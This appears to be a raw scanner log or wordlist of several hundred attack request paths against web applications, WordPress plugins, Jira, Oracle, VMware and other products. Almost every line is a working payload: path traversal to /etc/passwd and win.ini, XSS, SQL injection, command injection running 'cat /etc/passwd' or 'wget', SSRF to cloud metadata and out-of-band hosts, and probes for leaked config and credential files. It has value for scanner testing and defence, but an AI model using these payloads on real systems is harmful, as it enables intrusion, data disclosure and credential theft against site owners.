/web/mifs/user/login.jsp
/web/minio/webrpc
/web/module/ph_simpleblog/list?sb_category=')%20AND%20false--%20-
/web/module/ph_simpleblog/list?sb_category=')%20OR%20true--%20-
/web/MRTG/
/web/mrtg/
/web/msa/../../../../../../../../etc/passwd
/web/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd
/web/MUP/
/web/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF
/web/nbproject/project.properties
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1
/web/nifi-api/access/config
/web/oauth/token
/web/OA_HTML/bin/sqlnet.log
/web/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('24s4earAkcPDVwwSlO75VJb3k97')%3E
/web/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('24s4earAkcPDVwwSlO75VJb3k97')%3E
/web/OA_HTML/lcmServiceController.jsp
/web/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('24s4earAkcPDVwwSlO75VJb3k97')%3E
/web/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png
/web/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg
/web/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg
/web/objects/nuclei.txt
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/OpenAM-11.0.0/ui/PWResetUserValidation
/web/openam/json/serverinfo/*
/web/openam/UI/
/web/openam/UI/Login
/web/openam/UI/login
/web/openam/ui/PWResetUserValidation
/web/openam/XUI
/web/openam/XUI/
/web/openam/XUI/Login
/web/openam/XUI/login
/web/openapi.json
/web/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/web/opensis/index.php
/web/orders/3
/web/overview.asp
/web/owa/auth/x.js
/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd
/web/page/exportImport/fileTransfer/poc.jsp
/web/page/exportImport/uploadOperation.jsp
/web/pages
/web/pages/createpage-entervariables.action
/web/pages/createpage-entervariables.action?SpaceKey=x
/web/pages/createpage.action?spaceKey=myproj
/web/pages/doenterpagevariables.action
/web/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/pages/templates2/viewpagetemplate.action
/web/pandora_console/attachment/pandora_chat.log.json.txt
/web/password_change.cgi
/web/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
/web/pentaho/Login
/web/perl-status
/web/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00
/web/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22
/web/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22
/web/php/ping.php
/web/php/query.php
/web/plc/webvisu.htm
/web/plugin
/web/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
/web/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
/web/plugins/servlet/gadgets/makeRequest
/web/plugins/servlet/oauth/users/icon-uri?consumerUri=http:/
/web/plugins/weathermap/configs/poc.conf
/web/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7
/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei
/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/web/portal/favicon.ico
/web/portal/images/MyVue/MyVueHelp.png
/web/portal/info.jsp
/web/portal/webclient/index.html
/web/PRESENTATION/EPSONCONNECT
/web/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd
/web/proxy.stream?origin=http://burpcollaborator.net/
/web/PRTG/index.htm
/web/prtg/index.htm
/web/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/public/index.php/home/file/user_pics
/web/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php
/web/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
/web/pyproject.toml
/web/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
/web/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx
/web/qvisdvr/
/web/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa
/web/rapi/filedownload?filter=path:%2Fetc%2Fpasswd
/web/readme.txt
/web/register/?redirect_to=https://example.com/
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/reports/rwservlet/showenv
/web/ReportServer/Pages/ReportViewer.aspx
/web/rest/api/latest/serverInfo
/web/rest/sharelinks/1.0/link?url=https:///
/web/rest/tinymce/1/macro/preview
/web/roundcube/logs/errors.log
/web/roundcube/logs/sendmail
/web/RPC2
/web/run
/web/s/24s7kEkARrESzYtdmvAjiL1Cqk2/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/s/24s7kEkARrESzYtdmvAjiL1Cqk2/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/s/24s7kF5SsnY8FYwgq6BqibLdf70/_/;/WEB-INF/web.xml
/web/s/24s7kGAzCS0KwXpfrdTakkS6Nbm/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/s/24s7kGAzCS0KwXpfrdTakkS6Nbm/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/s/login
/web/s/sfsites/aura
/web/s3cmd.ini
/web/s=set&_method=__construct&method=*&filter[]=system
/web/sap/hana/xs/formLogin/login.html
/web/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..
/web/script/
/web/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
/web/scrm/crm/admin
/web/sdk/
/web/SDK/webLanguage
/web/search.php?search=%22;wget+http%3A%2F%2F%27;%22
/web/search.php?searchtype=5
/web/search/
/web/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
/web/SecMail/login.jsp
/web/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/secureader/javax.faces.resource/web.xml?loc=../WEB-INF
/web/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9
/web/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://
/web/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
/web/server-status
/web/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/web/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/web/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://%23.salesforce.com/
/web/service/rest/swagger.json
/web/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/web/settings.php.bak
/web/settings.php.dist
/web/settings.php.old
/web/settings.php.save
/web/settings.php.swp
/web/settings.php.txt
/web/sfmc/login
/web/sfsites/aura
/web/share/page/dologin
/web/Side.php
/web/sidekiq
/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/web/sitecore/shell/ClientBin/Reporting/Report.ashx
/web/sitecore/shell/sitecore.version.xml
/web/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/web/solr/
/web/solr/admin/cores?wt=json
/web/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
/web/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/web/src/login.php
/web/src/redirect.php?plugins[]=../../../../etc/passwd%00
/web/sslmgr
/web/sso/UI
/web/sso/UI/
/web/sso/XUI
/web/standard/default.php
/web/static../.git/config
/web/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/web/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5cetc/passwd
/web/static/..%5cetc/passwd
/web/static/../../../a/../../../../etc/passwd
/web/static///////../../../../etc/passwd
/web/struts2-rest-showcase/orders/3
/web/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/sysmgmt/2015/bmc/info
/web/system-diagnostics
/web/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/system/sharedir.php
/web/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
/web/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
/web/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}
/web/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/web/te%3Cimg%20src=x%20onerror=alert(42)%3Est
/web/template/custom/content-editor
/web/templates/editor-preload-container
/web/testing-put.txt
/web/tests/generate.php
/web/tests/support/stores/test_grid_filter.php?query=phpinfo();
/web/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
/web/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/web/thruk/cgi-bin/login.cgi
/web/tools.cgi
/web/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/Trace.axd
/web/translations/en.json
/web/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://
/web/UI
/web/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
/web/ui/jobs
/web/ui/PWResetUserValidation
/web/ui/vault/auth
/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://
/web/ui/vropspluginui/rest/services/getvcdetails
/web/uir//etc/passwd
/web/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
/web/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://
/web/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http:///
/web/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http:///
/web/Umbraco/feedproxy.aspx?url=http://
/web/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/upload
/web/user
/web/user.action
/web/user.php?act=login
/web/user/login
/web/user/login?redirect=%2F
/web/users/sign_in
/web/users/user-dark-features
/web/v0.1/
/web/v1/query
/web/v1/submissions
/web/v2/api/product/manger/getInfo
/web/v2/query
/web/verify.php?id=1&confirm_hash=
/web/version
/web/version.web
/web/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/viewlog.jsp
/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa
/web/vkd/GetWelcomeScreen.event
/web/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/web.config
/web/web/static/c:/windows/win.ini
/web/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/web/webadm/?q=moni_detail.do&action=gragh
/web/webadmin/out
/web/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd
/web/webadmin/start/
/web/webadmin/tools/systemstatus_remote.php
/web/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
/web/webapi/v1/system/accountmanage/account
/web/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/webEdition/showTempFile.php?file=../../../../etc/passwd
/web/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/web/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/web/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/website/blog/
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/webtools/control/main
/web/webtools/control/SOAPService
/web/webtools/control/xmlrpc
/web/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/web/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/web/wiki
/web/wiki/pages/createpage-entervariables.action
/web/wiki/pages/createpage-entervariables.action?SpaceKey=x
/web/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/web/wls-wsat/CoordinatorPortType
/web/wls-wsat/RegistrationRequesterPortType
/web/wp-admin/
/web/wp-admin/admin-ajax.php
/web/wp-admin/admin-ajax.php?action=0158228b8100449b0d3152687f07370b
/web/wp-admin/admin-ajax.php?action=action_name
/web/wp-admin/admin-ajax.php?action=c992ed7b44435ca30d8b79ff8b63a477
/web/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=
/web/wp-admin/admin-ajax.php?action=moove_read_xml
/web/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1
/web/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net
/web/wp-admin/admin.php
/web/wp-admin/admin.php?page=download_report&report=users&status=all
/web/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/web/wp-admin/index.php
/web/wp-admin/maint/repair.php
/web/wp-admin/options-general.php?page=yuzo-related-post
/web/wp-app.log
/web/wp-config-backup.txt
/web/wp-config-sample.php
/web/wp-config.inc
/web/wp-config.old
/web/wp-config.php
/web/wp-config.php-backup
/web/wp-config.php.bak
/web/wp-config.php.dist
/web/wp-config.php.html
/web/wp-config.php.inc
/web/wp-config.php.old
/web/wp-config.php.orig
/web/wp-config.php.original
/web/wp-config.php.save
/web/wp-config.php.swp
/web/wp-config.php.txt
/web/wp-config.txt
/web/wp-content/backup-db/
/web/wp-content/plugins/.git/config
/web/wp-content/plugins/1-flash-gallery/
/web/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00
/web/wp-content/plugins/bbpress/
/web/wp-content/plugins/boldgrid-backup/cron/restore-info.json
/web/wp-content/plugins/canto/includes/lib/detail.php?subdomain=
/web/wp-content/plugins/canto/includes/lib/get.php?subdomain=
/web/wp-content/plugins/canto/includes/lib/tree.php?subdomain=
/web/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd
/web/wp-content/plugins/contact-form-7/readme.txt
/web/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
/web/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/web/wp-content/plugins/easy-media-gallery-pro/
/web/wp-content/plugins/easy-wp-smtp/
/web/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/web/wp-content/plugins/insert-php/readme.txt
/web/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd
/web/wp-content/plugins/jh-404-logger/readme.txt
/web/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
/web/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd
/web/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/24s9H1JtPZ4JinD8GJ7A5LDtZVp/);marmoset.embed(%27a
/web/wp-content/plugins/mstore-api/
/web/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd
/web/wp-content/plugins/quiz-master-next/README.md
/web/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php
/web/wp-content/plugins/redirection/
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/web/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
/web/wp-content/plugins/simple-file-list/ee-file-engine.php
/web/wp-content/plugins/simple-file-list/ee-upload-engine.php
/web/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/web/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com
/web/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
/web/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
/web/wp-content/plugins/updraftplus/includes/
/web/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E
/web/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css
/web/wp-content/plugins/w3-total-cache/pub/sns.php
/web/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/web/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E
/web/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
/web/wp-content/plugins/wp-mail-smtp-pro/
/web/wp-content/plugins/wp-mail-smtp/
/web/wp-content/plugins/wp-payeezy-pay/donate.php
/web/wp-content/plugins/wp-statistics/readme.txt
/web/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress
/web/wp-content/plugins/wsecure/wsecure-config.php
/web/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
/web/wp-content/themes/.git/config
/web/wp-content/themes/altair/functions/
/web/wp-content/themes/altair/modules/
/web/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg
/web/wp-content/themes/prostore/go.php?https://example.com/
/web/wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ==
/web/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/
/web/wp-content/uploads/simple-file-list/nuclei.php
/web/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip
/web/wp-content/uploads/workreap-temp/24s8kFd4C6FbHAdU1XDC6prDiUg.php
/web/wp-content/uploads/workreap-temp/24s9H0oR28q08orHtg653uN5uD0.php
/web/wp-content/uploads/wp-security-audit-log/failed-logins/
/web/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/24s9H1QblS7aYrnypVvrIwxF6P4.txt
/web/wp-includes/ALFA_DATA/
/web/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com
/web/wp-json/buddypress/v1/signup
/web/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=
/web/wp-json/oembed/1.0/proxy?url=http:///
/web/wp-login.php
/web/wp-login.php.bak
/web/wp-login.php?redirect_to=http%3A%2F%2F192.168.1.104%2Fweb%2Fwp-admin%2Fadmin.php&reauth=1
/web/wps/PA_WCM_Authoring_UI/proxy/http/example.com
/web/ws/v1/cluster/apps/new-application
/web/ws/v1/cluster/info
/web/ws_utc/resources/setting/keystore
/web/ws_utc/resources/setting/options
/web/wt3/forceSave.php?file=/etc/passwd
/web/www/admin/index.php
/web/x
/web/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
/web/xmldata?item=CpqKey
/web/XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri
/web/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/web/xmlrpc/pingback
/web/XUI
/web/XUI/
/web/zdm/login_xdm_uc.jsp
/web/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://%23
/web/_async/AsyncResponseService
/web/_darcs/prefs/binaries
/web/_fragment?_path=_controller=phpcredits&flag=-1
/web/_ignition/execute-solution
/web/_netrc
/web/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
/web/_search
/web/_search?pretty
/web/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1
/web/_users/org.couchdb.user:poc
/web/_users/_all_docs
/web/_vti_inf.html
/web/_vti_pvt/service.cnf
/web/_wpeprivate/config.json
/web/__clockwork/app
/web?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23
/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
:80/
@/
http:///
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/openstack/latest
http://aws.interact.sh/metadata/v1.json
http://aws.interact.sh/openstack/latest
\..\..\..\..\Windows\win.ini
